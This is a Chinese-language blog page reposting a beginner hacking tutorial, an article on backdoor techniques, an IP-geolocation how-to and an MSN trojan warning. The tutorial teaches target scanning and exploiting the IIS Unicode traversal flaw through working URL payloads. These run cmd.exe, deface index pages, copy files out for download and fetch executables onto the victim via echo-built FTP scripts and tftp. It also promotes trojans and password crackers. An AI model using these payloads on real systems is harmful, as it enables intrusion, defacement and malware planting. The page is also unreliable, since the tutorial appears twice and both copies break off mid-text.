Thursday, June 3, 2010

HACKER菜鳥入門[經典]

摘 自:http://www.anqn.com/article/a/2005-07-18/a092006.shtml

這 是一套適合初學者由淺到深的文章,所以強烈推薦給大家,作者從基礎講到最近比較火的漏洞,可能有些人看來是淺了些,但是的確很適合想幹點啥但又不知道怎麼 辦的菜鳥們,….
========================================
第一節、伸展運動:

這 節操我們要準備道具,俗話說:“工欲善其事,必先利其器”,要學習駭客技術, 一些必要的工具必不可少。

1、一台屬於自己的可以上網的電腦:這樣你可以有充分的支配權,上網不用說,否則你怎麼看到 我的文章?wap?呵呵!屬於自己很重要,否則安全性是個很大的問題,這點 相信大家沒有問題。

2windows2000/nt: 別和我說98/me,他們是你們同學用來玩遊戲的!(當然,我也是鐵杆game fan)對網絡支持極差,命令受限制,很多軟件又不能用,對駭客來說使用起來絆手絆腳,非常不利。這 裡我推薦2000,這是一個很成熟的系統(漏洞還是有一堆)。推薦雙系統,這樣黑玩搭配,幹活不 累。

3、冰河--中國第一木 馬:中者數不勝數,國人驕傲。雖然用冰河根本不能算駭客,但它確實能培養你對駭客的興趣,同時幫助你瞭解網絡,相信很多駭客同學都是這樣起步的。靜 止寫的那篇冰河教程很不錯,大家仔細看看。而且,以後你學會入侵服務器,用冰河操作也會減少工作量。(我是懶蟲,爽!)

4oicq:學駭客,可不是學泡mm!不要忘了,眾人拾柴 火更高,我們通過cshu的 成員列表,互相聯系幫助,對提高水準很有幫助!另外要廢話一句:據我瞭 解,現在駭客網站下載最多的 都是針對oicq的 破解工具,我個人認為很無聊,偷個密碼代表什麼,浪費時間!

5superscan:很好用的埠掃描器,速度超 快,功能一流,一旦擁有,別無所求……不論是找木馬受害者,還是 掃服務器埠,它都非常有效,cshu強 烈推薦!

6、一本筆記本/便條: 網上資料相當多,駭客處理的也是非常之多,良好的習慣決定了你的效率,準備一本筆記本,記錄下你的成果,肉雞、木馬利用、命令、密碼……等,堅持一下,你 會發現你的效率大幅上升的!

7lc3:著名nt/2000sam破解程式,有時我們拿不到足夠權限,又沒好辦法,那麼lc3是最好的解決辦法,只要你拿的到sam,你就是服 務器它爺爺!本站有其破解程式,支援了暴力破解!

8、程式合並,這是玩木馬必需的,雖然木馬是很低的手段,但有時配合巧辦法(以 後我會介紹)確實能夠達到意想不到的效果,朋友們可以在空閑時玩玩木馬,很有趣,若你能巧妙的騙過mm,那麼webmaster也可能被你騙倒。〉

9、流光4for 2000/nt:可能是世界上最好 的綜合類黑軟!中國的驕傲,它集成了很全的漏洞資訊,速度 快,方法多,對有漏洞的主機是毀滅性的打擊,操作又方便,是快速黑站必不可少的精品工具。超級吐血推薦!!

10、良好的心態、穩定的情緒、刻苦鑽研的精神、刨根問底的作風、打掃房間的習 慣:駭客是門很高深的學問,不要幻想一步登天,失敗是常有的事,千萬不可灰心。在那麼多黑軟的包圍下,切不可完全依賴他們,一定要瞭解它們利用什麼原理工 作。對任何一個小問題,小細節,一定要問清楚,cshu就是給大家互相交流的場所哦!黑完後不要 得 意忘形,打掃戰場也很重要,以防萬一。


第 一節操完,可能很無聊,我就這點水準,大家見諒!這裡我說一句大話:做完菜鳥操,包你會黑簡單的站!

下 一節操我們要介紹如何掌握一台主機的基本資訊,……

========================================

今天的內容是獲得主機的資訊。 我們要黑一台主 機,首先要瞭解它的資訊,包括它的類型,用戶列表,目錄,埠,漏洞等等。

首先我們我們要找一台主機來練 手,隨便挑吧!www.flyingfish.com(亂 說的)

第一步,先在ie裡 看看吧,mmmm.....做的還行,挺精緻 的!主要是我們肯定了它現在是正常的。 然後,我們應該知道它的ip,很簡單,ping它一下就可以了。

ping www.flyingfish.com,看看視窗裡有了什麼?是不是有三行回應,其中的111.111.222.222就是ip了(還是胡說 的,一個例子)。

有 人是不是要問,我這裡怎麼沒有,那可能是兩個原因:第一,你打錯命令了;第二,該主機裝了防火墻,禁止ping, 不過這種可能很小。

知 道了ip,下一步應該確定埠了。下面是一些常 用的埠的默認值

21--ftp 重要哦

23--telnet 歡呼吧

25-smtp 盡管重要,但似乎沒什麼可利用的

53--domain 同上

79--finger 可知道用戶資訊了

80--http 要看網頁,沒它不行吧

110--pop 收信的

139--netbios 共用用的,很有利用價值哦

3389--win2000超級終端 呵 呵,這個 好!

其實埠有上 千種,這些最最常用。

我 們怎麼知道服務器有什麼埠打開呢??去找個掃描器吧,x-scansuper scanflux等等很多哦!這裡我推 薦super scan ,速度很快,本站也有其教程哦!用法還是比較傻瓜的,估計大家不會有問 題,輕輕幾點, 打開的埠就出現了。不錯不錯,上面說到的都有(太理想化了吧!

那麼我們該如何應對呢?

ps:忘了說一聲,順便掃一下7626,冰河有也說不 準哦!

若 有ftp:那就用用匿名登錄。自己動手也行, 最好用x-scan flux等吧!反 正,有ftp就有一份希望

telnet:在!這個好!telnet 111.111.222.222,出現窗口了吧!嗯?要密碼?看來網管還不是超級白癡……隨 便猜個,錯了,閃人!

smtp:看著它,無奈

domain:一般它帶了局域網了

finger 可 以知道用戶列表了,不好,忘了用法了,幸好finger很少出現

80肯定在:我們等會來對付它

110 smtppop在也不奇怪了!

139 找個掃描器來找找有沒有露在外面的共用吧,日 後也用得著。

3389 太太太 好了!!打開客戶端吧,用輸入法漏洞試試,成了就幹了它!不成也沒事,我們以後完全控制它3389會 很方便的。

埠 掃完了!我們在多瞭解它一點吧!追捕大家都知道吧,其實用它獲取主機資訊也不賴哦!打開追捕,輸入ip, 選擇智慧追捕,是不是有很多資訊出來了?雖然不能直接利用,但畢竟我們有對它有了進一步的瞭解。

掌 握了那麼多資訊,我們該做點什麼了,一般駭客入侵都是靠著系統漏洞,不會都傻傻地去暴力破解的;我們現在就要看看它有什麼漏洞。

對漏洞大家可能不太瞭解,我這 裡也不能一一說明瞭,太多了,感興趣的話去論壇找freedom吧!

目前廣泛利用和存在的漏洞有:unicodeunicode後續、iis溢出、idqfrontpage extend、輸入法漏洞 等等大漏洞。 至 於如何確定,呵呵!絕對不會是一行一行地在ie 拿出x-scan吧,很好的掃描器哦!

稍 微設置一下就上路吧!過了一會,呵呵,報告出來了,快看,哇!漏洞一大堆!這下賺了!各條漏洞都有詳細的資訊,大家看吧,總比我說的準了。

現在這台主機已經和我們成為親 戚了,要讓這位親愛的親戚做點事,就要開始各種攻擊了,下回我們就探討一下最最可愛的unicode漏 洞,各位可能就會在unicode中完成第一次駭客體驗,再見~~

========================================

今 天我們談談unicode漏洞,這可是基礎中 的基礎,重點裡的重點,不懂的一定要好好學。

20001017日 中聯綠盟發佈了以下的安全公告:

微軟IIS 4.0 / 5.0 擴展UNICODE目錄遍 歷漏洞

遠 程漏洞:是

本 地漏洞:是

發 佈日期:20001017

更 新日期:20001017

受 影響的版本:Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

這 可是中國乃至全球網路安全界的一次大變節,入侵nt/2000系 統變得如此簡單,不打補丁的死路一 條。

下面開始正式學習:
一、UNICODE漏洞的原理

此 漏洞從中文IIS4.0+SP6開始,還影響 中文WIN2000+IIS5.0、 中文WIN2000+IIS5.0+SP1 臺 灣繁體中文也同樣存在這樣的漏洞。

中 文版的WIN2000中,UNICODE編 碼 存在BUG,在UNICODE 編碼中
%c1%1c -
(0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = /
%c0%2f -
(0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = \
NT4/編碼為%c1%9c
英文版裡: WIN2000英 文版%c0%af
在中文win2k裡:%c1%1c
此 外還有多種編碼,不一一闡述。
本文例子均 以win2k為 准,其他類型請自行替換。

二、一切從基礎開始:

由於winnt\system32\cmd.exe的 存在,使遠端執行命令變為可能,在流覽器裡輸入以下請求:(假設11.11.22.22有漏洞)
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
學 過dos的應該可以看懂,其實就是利用當中的非法請求使我們可以連到system32下,如果inetpub\目錄不合winnt同盤,或者目錄級數有改動,可能會引起請求失敗。

如果成功,那麼在流覽區可看到如下資訊:
Directory of C:\inetpub\scripts
2000-09-28 15:49
DIR .
2000-09-28 15:49
DIR .. (假設目錄中沒有檔,實際上有一大 堆)
是不是有自己機器的感覺了,正點!就 是這種感覺!

cmd.exe相 當與dos裡 的command.com,因 此,我們可以執行很多命令了!

http://11.11.22.22/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
(這 個命令同樣道理)
大家請注意:/c後面的+,實際上,他就是空格,請記牢!dir開始就是dos命令了,我們可以更改一下:
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

dos的朋友一定懂其意義了,不懂的請去看書
不用說,大家也知道我們就可以利用它來對有漏洞的機器展開攻擊了!

三、實戰演練:

1、修改主頁(是不是很爽?):

一般主頁位置在c:\inetpub\wwwroot下, 但要是改了路徑,就需要找找了。

最方便的方法:在流覽器裡輸入 http://11.11.22.22/.ida,要是有漏洞,那在流覽器裡便會顯示主頁路徑,這個漏洞存在 率很高,自然是我們的首選。

分 析法:用dir看各個盤符的根目錄,看可疑的 就進去看,運氣好的在一分鐘裡找到,這要看運氣和直 覺。

dir/s法:首先在看其主頁,找個圖片或連接,看它的檔案名,比如,11.11.22.22首 頁上有一幅圖片,右擊,屬性,看到了嗎?iloveu.gif, 然後我們利用unicode輸入這條命令dir c:\iloveu.gif /s意 味著查找c盤下所有目錄裡的iloveu.gif, 注意實際應用時別忘了把空格改為+,如 果沒有繼續找d盤, 很快就能確定主頁目錄的。

找 到了目錄,就要對它開刀了!一般默認收頁為index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中 的一個,現在我們確定11.11.22.22中為index.htm

那 麼我們就修改它吧!

最 方便的方法:

1echo法:

echo是一個系統命令,主要用於設置回應開關,而echo cshu >c:\autoexe.bat就是把cshu加 入autoexec.bat裡並刪除原有內容,echo cshunice >>c:\autoexec.bat就 是加入cshunice但 不刪除原有內容,這樣我們就可以逍遙的改了。
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
回 應為:HTTP 500 - 內部伺服器錯誤
通 過對cmd的分析,袁哥得出一條簡便的方 法,加入"符 號
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm
回 應為:cgi錯誤,不用理會
兩條 命令一下,呵呵,再看看11.11.22.22, 是不是烙上我們的大名了?不錯吧
而在實際 操作中,可能袁哥的方法也會失效,這時,我們就可以copy cmd.exe 為另一個exe,記住路徑,用copy後的來echo
例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe
11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

2、上傳法:

echo有 點不講道理,把人家的文件破壞了,要是想在主頁上增光添彩,那就應該用改好的主頁上傳,這個我們後面介紹。

幾 點忠告:

1、對於沒有主頁的機器(就是正在建立的主頁),不要改它,這很沒水準,也很沒道德

2echo前記得幫他們做好備份。

3、不准在主頁裡加入惡性語句。

4、下載檔案

要 是有什麼有用的檔被你發現,那我們如何下載呢?
最 簡單的方法:把檔copy至網頁目錄下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然 後,下載11.11.22.22/baby.zip就行了,注意!實際應用中要記得對檔案名進行 修 改,總之不能暴露。

別 的方法:對不起,沒想好!

2、最重要的上傳

一般方法、ftp
首先建一個ftp指 令檔:c:\hehe.haha(名字亂取 把),申請一個ftp帳 號,然後用echo吧!

echo+open ftp.cshu.comftp主機) > c:\hehe.haha
echo+user yourname >> cc:\hehe.haha (yourname
是 用戶名)
echo+yourpasswd >> c:\hehe.haha (yourpasswd
是 密碼)
echo+get setup.exe >> c:\hehe.haha
要 下載的文件
echo+quit >> c:\hehe.haha

完 了以後:ftp+/s:c:\hehe.haha, 由於是ftp主 機,那麼速度一定很快,過一會setup.exe就 會出現在目前的目錄了(也就是cmd所在目錄)。
別 忘了先上傳到ftp主機,不要做馬大哈哦!
最 簡單的方法:tftp法。
這種方法 不用中轉伺服器,首先準備一個tftp服務端,它的作用就是把你的機器做成一個tftp伺 服器,利用漏洞機器來下載(注意,運行tftp時 不要運行其他的ftp軟體
在 這裡我推薦cisco tftp server, 自己去找找把,實在沒有來找我。)
安裝好 後運行,別忘了設置好預設目錄,否則會找不到檔。
tftp
命 令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exeihateu.exe在預設目

4種後門技術知識講解

摘自:http://twnzone.org/discuz/viewthread.php?tid=175685& extra=page%3D2

正在暗渡陳倉 4種後門技術知識講解
曾經飽受木馬、後門(以下統稱後門)侵害的人們都不會忘記機器被 破壞後的慘象,於是人們展開了積極的防禦工作,從補丁到防火牆,恨不得連網線都加個驗證器,在多種多樣的防禦手法夾攻下,一大批後門倒下了,菜鳥們也不用 提心吊膽上網了…… 可是後門會因此罷休嗎?答案當然是否定的。君不見,在風平浪靜的陸地下,一批新的後門正在暗渡陳倉……

  1、反客為 主的入侵者

  黑客A連接上了網絡,卻不見他有任何行動,他在幹什麼呢?我們只能看見他燃起一支煙,似乎在發呆……過了一會兒,他突然把煙 頭一丟,雙手迅速敲擊鍵盤,透過屏幕,我們得知他已經進入了一個企業內部的服務器,一台安裝了防火牆、而且深居內部的服務器……他怎麼做到的呢?莫非他是 神仙?請把鏡頭回退到剛才那一幕,黑客A在煙霧熏繞中盯著一個程序界面出神,突然,那個界面變動了一下,同時,黑客A也開始敲打鍵盤,接下來就是熟悉的控 制界面。各位也許不相信自己的眼睛了:難道是那台機器自己找上他的?不可能…… 可是這是事實,真的是服務器自己找上來的。黑客A也不是高技術,他只是使用了一種反客為主的後門——反彈木馬。

  眾所周知,通常說的入侵 都是入侵者主動發起攻擊,這是一種類似捕獵的方式,在警惕性高的獵物面前,他們已經力不從心;可是對於使用反彈技術的入侵者來說,他們卻輕鬆許多,反彈木 馬就如一個狼外婆,等著小紅帽親自送上門去。一般的入侵是入侵者操作控制程序去查找連接受害計算機,而反彈入侵卻逆其道而行之,它打開入侵者電腦的一個 端口,卻讓受害者自己與入侵者聯繫並讓入侵者控制,由於大多數防火牆只處理外部數據,對內部數據卻閉上眼睛,於是,悲劇發生了。

  反彈木 馬的工作模式如下:受害者(被植入反彈木馬服務端的計算機)每間隔一定時間就發出連接控制端的請求,這個請求一直循環到與控制端成功連接;接下來控制端接 受服務端的連接請求,兩者之間的信任傳輸通道建立;最後,控制端做的事情就很普通了——取得受害者的控制權。由於是受害者主動發起的連接,因此防火牆在大 多數情況下不會報警,而且這種連接模式還能突破內網與外部建立連接,入侵者就輕易的進入了內部的計算機。

  雖然反彈木馬比起一般木馬要可 怕,但是它有天生的緻命弱點:隱蔽性還不夠高,因為它不得不在本地開放一個隨機端口,只要受害者有點經驗,認出反彈木馬不是難事。於是,另一種木馬誕生 了。

  2、不安分的正常連接

  現在有很多用戶都安裝了個人HTTP服務器,這就注定了機器會開著80端口,這很正常,但 是有誰知這是一個給無數網絡管理員帶來痛苦的新技術,它讓一個正常的服務變成了入侵者的利器。

  當一台機器被種植Tunnel後,它的 HTTP端口就被Tunnel重新綁定了——傳輸給WWW服務程序的數據,也在同時傳輸給背後的Tunnel,入侵者假裝瀏覽網頁(機器認為),卻發送了 一個特殊的請求數據(符合HTTP協議),Tunnel和WWW服務都接收到這個信息,由於請求的頁面通常不存在,WWW服務會返回一個HTTP404應 答,而Tunnel卻忙開了……

  首先,Tunnel發送給入侵者一個確認數據,報告Tunnel存在;然後Tunnel馬上發送一個新 的連接去索取入侵者的攻擊數據並處理入侵者從HTTP端口發來的數據;最後,Tunnel執行入侵者想要的操作。由於這是「正常」的數據傳輸,防火牆一樣 沒看見。但是目標沒開放80端口怎麼辦呢?擅自開一個端口等於自殺。但是入侵者不會忘記那個可愛的NetBIOS端口——長年累月開放的139端口,和它 分享數據,何樂不為? Tunnel技術使後門的隱蔽性又上了一個級別,可是這並不代表無懈可擊了,因為一個有經驗的管理員會通過Sniffer看到異常的景象…… Tunnel攻擊被管理員擊潰了,可是,一種更可怕的入侵正在偷偷進行中……

3、無用的數據傳輸?

  1.眼皮底下的偷竊者 ——ICMP

  ICMP,Internet Control Message Protocol(網際控制信息協議),最常見的網絡報文,近年來被大量用於洪水阻塞攻擊,但是很少有人注意到,ICMP也偷偷參與了這場木馬的戰爭…… 最常見的ICMP報文被用作探路者——PING,它實際上是一個類型8的ICMP數據,協議規定遠程機器收到這個數據後返回一個類型0的應答,報告「我在 線」。可是,由於ICMP報文自身可以攜帶數據,就注定了它可以成為入侵者的得力助手。由於ICMP報文是由系統內核處理的,而且它不佔用端口,因此它有 很高的優先權。ICMP就像系統內核的親戚,可以不受任何門衛阻攔,於是,籃子裡藏著武器的鄉下老人敲響了總統的房門……

  使用特殊的 ICMP攜帶數據的後門正在悄然流行,這段看似正常的數據在防火牆的監視下堂而皇之的操縱著受害者,即使管理員是個經驗豐富的高手,也不會想到這些「正 常」的ICMP報文在吞噬著他的機器。有人也許會說,抓包看看呀。可是,實際應用中,傳遞數據的ICMP報文大部分肯定是加密過的,你怎麼檢查?

   不過,ICMP也不是無敵的,有更多經驗的管理員乾脆禁止了全部ICMP報文傳輸,使得這位親戚不得再靠近系統,雖然這樣做會影響系統的一些正常功能, 可是為了避免被親戚謀殺,也只能忍了。最親密最不被懷疑的人,卻往往是最容易殺害你的人。

  2.不正常的郵遞員——IP首部的計謀

   我們都知道,網絡是建立在IP數據報的基礎上的,任何東西都要和IP打交道,可是連IP報文這個最基本的郵遞員也被入侵者收買了,這場戰爭永不停歇…… 為什麼呢?我們先略瞭解一下IP數據報的結構,它分為兩個部分,首部和身體,首部裝滿了地址信息和識別數據,正如一個信封;身體則是我們熟悉的數據,正如 信紙。任何報文都是包裹在IP報文裡面傳輸的,通常我們只留意信紙上寫了什麼,卻忽略了信封上是否塗抹了氰酸鉀。於是,很多管理員死於檢查不出的疑症……

   這是協議規範的缺陷導緻的,這個錯誤不是唯一的,正如SYN攻擊也是協議規範的錯誤引起的。相似的是,兩者都用了IP首部。SYN是用了假信封,而「套 接字」木馬則是在信封上多餘的空白內容塗抹了毒藥——IP協議規範規定,IP首部有一定的長度來放置標誌位(快遞?平信?)、附加數據(對信的備註),結 果導緻IP首部有了幾個字節的空白,別小看這些空白,它能攜帶劇毒物質。這些看似無害的信件不會被門衛攔截,可是總統卻不明不白的死在了辦公室……

   入侵者用簡短的攻擊數據填滿了IP首部的空白,如果數據太多,就多發幾封信。混入受害者機器的郵遞員記錄信封的「多餘」內容,當這些內容能拼湊成一個攻 擊指令的時候,進攻開始了……

  結語

  後門技術發展到今天,已經不再是死板的機器對機器的戰爭,它們已經學會考驗人類, 現在的防禦技術如果依然停留在簡單的數據判斷處理上,將被無數新型後門擊潰。真正的防禦必須是以人的管理操作為主體,而不是一味依賴機器代碼,否則你的機 器將會被腐蝕得面目全非……

從Google地圖找到每個IP的上網地區

當你的防駭軟體攔截到 有人企圖入侵、或是有某個IP位址正在對你做不明掃瞄,應該很想查出這個IP的來源吧?或者如果你有架Web網站、FTP站台,看到每天有那麼多人連進你 的電腦,應該 也好奇他們是從哪個國家、哪個城市連過來的吧?想查到某IP的來源地點並不算難,網路上有很多「Whois」的服務可查詢IP位址的所屬單位,不過顯示結 果是一堆文字資訊,要解 讀也是很累人。如果直接在地圖上秀出這個IP的城市位置,那不是清楚多了嗎?現在已有人利用Google地圖做出了這項服務喔!
Step
1. 我們以測試「交大」主機的IP位址為例,在【開始】→【執行】輸入「cmd」按下〔確定〕後,在「命令提示字元視窗」輸入「ping www.nctu.edu.tw」,可以查出網址的相對IP。

2.接著開啟瀏覽器,連至「http://www.ip-adress.com/」, 一開始會顯示你自己的上網IP位址和地圖資訊,你可以換成輸入剛才查到的IP後按下〔lookup any ip〕,就會秀出該IP的位址、經緯度、所屬ISP等訊息,以及「Google Map」的地圖定位。

3.右邊的地圖上方有一些基本控制 項,例如放大、縮小,而點選「Satellite」則可以切換成衛星地圖,就能特寫這個IP所在的地區。另外,按下地圖下方的「Big IP Address Map」,還可以秀出更完整清楚的衛星空照圖。

4.如此一來,我們就可以在「Google Map」上,透過IP定位的方式,順利找到我們想找的地點囉!

※和一般Whois服務一樣,這裡查詢到的IP來源,是發放單位的地址,例 如一般Hinet ADSL網路用戶的IP,就是顯示中華電信公司的所在位置。只有固定IP位址才會定位到真正的上網來源。

用MSN的人一定要看~別被騙了!!!!

相信最近很多人都會收到這封E-mail,告訴你
MSN BlockDetect可以看你的MSN被誰封鎖或是刪除
這個小軟體可以看你MSN上面的朋友,有誰 把你封鎖了或是刪除了
1.下載後解壓縮直接執行
2.在Username裡面填入自己的MSN帳號
3. Password裡填入自己的密碼
4.在登入時,程式會問你在查詢時,MSN會斷線
5.是否接受?選Yes即可
6.左下方的視窗 是把你封鎖的,右下方的視窗是把你刪除的!!!!
請千萬不要使用!這是一個含有【木馬】的病毒程式
目的是盜 取你的MSN帳號與密碼
若有發現 meltdown@hotmail.com加你入msn,請千萬不要加他!!
不要被騙了.請馬上轉達給 你的朋友
因為他帶著病毒!!!
請 告訴你所有的msn聯絡人和你的朋友!!!
如果你其中一個在你通訊欄的朋友一中毒,所有他通訊欄上的朋友
都也逃不過中獎的噩運!!!當然 包括你啦!!!!請快點告訴你的朋友喔

Thursday, June 3, 2010

HACKER菜鳥入門[經典]

摘 自:http://www.anqn.com/article/a/2005-07-18/a092006.shtml

這 是一套適合初學者由淺到深的文章,所以強烈推薦給大家,作者從基礎講到最近比較火的漏洞,可能有些人看來是淺了些,但是的確很適合想幹點啥但又不知道怎麼 辦的菜鳥們,….
========================================
第一節、伸展運動:

這 節操我們要準備道具,俗話說:“工欲善其事,必先利其器”,要學習駭客技術, 一些必要的工具必不可少。

1、一台屬於自己的可以上網的電腦:這樣你可以有充分的支配權,上網不用說,否則你怎麼看到 我的文章?wap?呵呵!屬於自己很重要,否則安全性是個很大的問題,這點 相信大家沒有問題。

2windows2000/nt: 別和我說98/me,他們是你們同學用來玩遊戲的!(當然,我也是鐵杆game fan)對網絡支持極差,命令受限制,很多軟件又不能用,對駭客來說使用起來絆手絆腳,非常不利。這 裡我推薦2000,這是一個很成熟的系統(漏洞還是有一堆)。推薦雙系統,這樣黑玩搭配,幹活不 累。

3、冰河--中國第一木 馬:中者數不勝數,國人驕傲。雖然用冰河根本不能算駭客,但它確實能培養你對駭客的興趣,同時幫助你瞭解網絡,相信很多駭客同學都是這樣起步的。靜 止寫的那篇冰河教程很不錯,大家仔細看看。而且,以後你學會入侵服務器,用冰河操作也會減少工作量。(我是懶蟲,爽!)

4oicq:學駭客,可不是學泡mm!不要忘了,眾人拾柴 火更高,我們通過cshu的 成員列表,互相聯系幫助,對提高水準很有幫助!另外要廢話一句:據我瞭 解,現在駭客網站下載最多的 都是針對oicq的 破解工具,我個人認為很無聊,偷個密碼代表什麼,浪費時間!

5superscan:很好用的埠掃描器,速度超 快,功能一流,一旦擁有,別無所求……不論是找木馬受害者,還是 掃服務器埠,它都非常有效,cshu強 烈推薦!

6、一本筆記本/便條: 網上資料相當多,駭客處理的也是非常之多,良好的習慣決定了你的效率,準備一本筆記本,記錄下你的成果,肉雞、木馬利用、命令、密碼……等,堅持一下,你 會發現你的效率大幅上升的!

7lc3:著名nt/2000sam破解程式,有時我們拿不到足夠權限,又沒好辦法,那麼lc3是最好的解決辦法,只要你拿的到sam,你就是服 務器它爺爺!本站有其破解程式,支援了暴力破解!

8、程式合並,這是玩木馬必需的,雖然木馬是很低的手段,但有時配合巧辦法(以 後我會介紹)確實能夠達到意想不到的效果,朋友們可以在空閑時玩玩木馬,很有趣,若你能巧妙的騙過mm,那麼webmaster也可能被你騙倒。〉

9、流光4for 2000/nt:可能是世界上最好 的綜合類黑軟!中國的驕傲,它集成了很全的漏洞資訊,速度 快,方法多,對有漏洞的主機是毀滅性的打擊,操作又方便,是快速黑站必不可少的精品工具。超級吐血推薦!!

10、良好的心態、穩定的情緒、刻苦鑽研的精神、刨根問底的作風、打掃房間的習 慣:駭客是門很高深的學問,不要幻想一步登天,失敗是常有的事,千萬不可灰心。在那麼多黑軟的包圍下,切不可完全依賴他們,一定要瞭解它們利用什麼原理工 作。對任何一個小問題,小細節,一定要問清楚,cshu就是給大家互相交流的場所哦!黑完後不要 得 意忘形,打掃戰場也很重要,以防萬一。


第 一節操完,可能很無聊,我就這點水準,大家見諒!這裡我說一句大話:做完菜鳥操,包你會黑簡單的站!

下 一節操我們要介紹如何掌握一台主機的基本資訊,……

========================================

今天的內容是獲得主機的資訊。 我們要黑一台主 機,首先要瞭解它的資訊,包括它的類型,用戶列表,目錄,埠,漏洞等等。

首先我們我們要找一台主機來練 手,隨便挑吧!www.flyingfish.com(亂 說的)

第一步,先在ie裡 看看吧,mmmm.....做的還行,挺精緻 的!主要是我們肯定了它現在是正常的。 然後,我們應該知道它的ip,很簡單,ping它一下就可以了。

ping www.flyingfish.com,看看視窗裡有了什麼?是不是有三行回應,其中的111.111.222.222就是ip了(還是胡說 的,一個例子)。

有 人是不是要問,我這裡怎麼沒有,那可能是兩個原因:第一,你打錯命令了;第二,該主機裝了防火墻,禁止ping, 不過這種可能很小。

知 道了ip,下一步應該確定埠了。下面是一些常 用的埠的默認值

21--ftp 重要哦

23--telnet 歡呼吧

25-smtp 盡管重要,但似乎沒什麼可利用的

53--domain 同上

79--finger 可知道用戶資訊了

80--http 要看網頁,沒它不行吧

110--pop 收信的

139--netbios 共用用的,很有利用價值哦

3389--win2000超級終端 呵 呵,這個 好!

其實埠有上 千種,這些最最常用。

我 們怎麼知道服務器有什麼埠打開呢??去找個掃描器吧,x-scansuper scanflux等等很多哦!這裡我推 薦super scan ,速度很快,本站也有其教程哦!用法還是比較傻瓜的,估計大家不會有問 題,輕輕幾點, 打開的埠就出現了。不錯不錯,上面說到的都有(太理想化了吧!

那麼我們該如何應對呢?

ps:忘了說一聲,順便掃一下7626,冰河有也說不 準哦!

若 有ftp:那就用用匿名登錄。自己動手也行, 最好用x-scan flux等吧!反 正,有ftp就有一份希望

telnet:在!這個好!telnet 111.111.222.222,出現窗口了吧!嗯?要密碼?看來網管還不是超級白癡……隨 便猜個,錯了,閃人!

smtp:看著它,無奈

domain:一般它帶了局域網了

finger 可 以知道用戶列表了,不好,忘了用法了,幸好finger很少出現

80肯定在:我們等會來對付它

110 smtppop在也不奇怪了!

139 找個掃描器來找找有沒有露在外面的共用吧,日 後也用得著。

3389 太太太 好了!!打開客戶端吧,用輸入法漏洞試試,成了就幹了它!不成也沒事,我們以後完全控制它3389會 很方便的。

埠 掃完了!我們在多瞭解它一點吧!追捕大家都知道吧,其實用它獲取主機資訊也不賴哦!打開追捕,輸入ip, 選擇智慧追捕,是不是有很多資訊出來了?雖然不能直接利用,但畢竟我們有對它有了進一步的瞭解。

掌 握了那麼多資訊,我們該做點什麼了,一般駭客入侵都是靠著系統漏洞,不會都傻傻地去暴力破解的;我們現在就要看看它有什麼漏洞。

對漏洞大家可能不太瞭解,我這 裡也不能一一說明瞭,太多了,感興趣的話去論壇找freedom吧!

目前廣泛利用和存在的漏洞有:unicodeunicode後續、iis溢出、idqfrontpage extend、輸入法漏洞 等等大漏洞。 至 於如何確定,呵呵!絕對不會是一行一行地在ie 拿出x-scan吧,很好的掃描器哦!

稍 微設置一下就上路吧!過了一會,呵呵,報告出來了,快看,哇!漏洞一大堆!這下賺了!各條漏洞都有詳細的資訊,大家看吧,總比我說的準了。

現在這台主機已經和我們成為親 戚了,要讓這位親愛的親戚做點事,就要開始各種攻擊了,下回我們就探討一下最最可愛的unicode漏 洞,各位可能就會在unicode中完成第一次駭客體驗,再見~~

========================================

今 天我們談談unicode漏洞,這可是基礎中 的基礎,重點裡的重點,不懂的一定要好好學。

20001017日 中聯綠盟發佈了以下的安全公告:

微軟IIS 4.0 / 5.0 擴展UNICODE目錄遍 歷漏洞

遠 程漏洞:是

本 地漏洞:是

發 佈日期:20001017

更 新日期:20001017

受 影響的版本:Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

這 可是中國乃至全球網路安全界的一次大變節,入侵nt/2000系 統變得如此簡單,不打補丁的死路一 條。

下面開始正式學習:
一、UNICODE漏洞的原理

此 漏洞從中文IIS4.0+SP6開始,還影響 中文WIN2000+IIS5.0、 中文WIN2000+IIS5.0+SP1 臺 灣繁體中文也同樣存在這樣的漏洞。

中 文版的WIN2000中,UNICODE編 碼 存在BUG,在UNICODE 編碼中
%c1%1c -
(0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = /
%c0%2f -
(0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = \
NT4/編碼為%c1%9c
英文版裡: WIN2000英 文版%c0%af
在中文win2k裡:%c1%1c
此 外還有多種編碼,不一一闡述。
本文例子均 以win2k為 准,其他類型請自行替換。

二、一切從基礎開始:

由於winnt\system32\cmd.exe的 存在,使遠端執行命令變為可能,在流覽器裡輸入以下請求:(假設11.11.22.22有漏洞)
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
